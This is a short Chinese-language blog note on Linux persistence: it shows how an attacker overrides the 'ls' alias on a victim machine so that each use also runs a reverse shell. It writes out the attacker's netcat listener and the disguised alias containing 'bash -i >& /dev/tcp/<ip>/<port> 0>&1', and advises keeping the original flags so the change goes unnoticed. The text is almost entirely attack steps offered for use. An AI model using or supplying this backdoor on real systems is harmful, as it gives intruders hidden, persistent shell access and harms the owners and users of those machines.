【笔记】Linux为命令添加别名时执行反弹Shell 发表于 2024-12-04 更新于 2025-12-26 阅读次数: 前言Linux为命令添加别名时执行反弹Shell,从而实现权限维持 查看原命令是否已经有别名(可选) 有些命令已经定义别名了,此时再伪造别名时要注意携带旧参数 1alias ls 1alias ls='ls --color=auto' 攻击者监听反弹Shell1nc -lvp <port_local> 在受害机伪造新的别名并反弹Shell1alias ls='alerts(){ ls --color=auto $*; bash -i >& /dev/tcp/<ip>/<port> 0>&1; };alerts' 受害者执行别名命令1ls 完成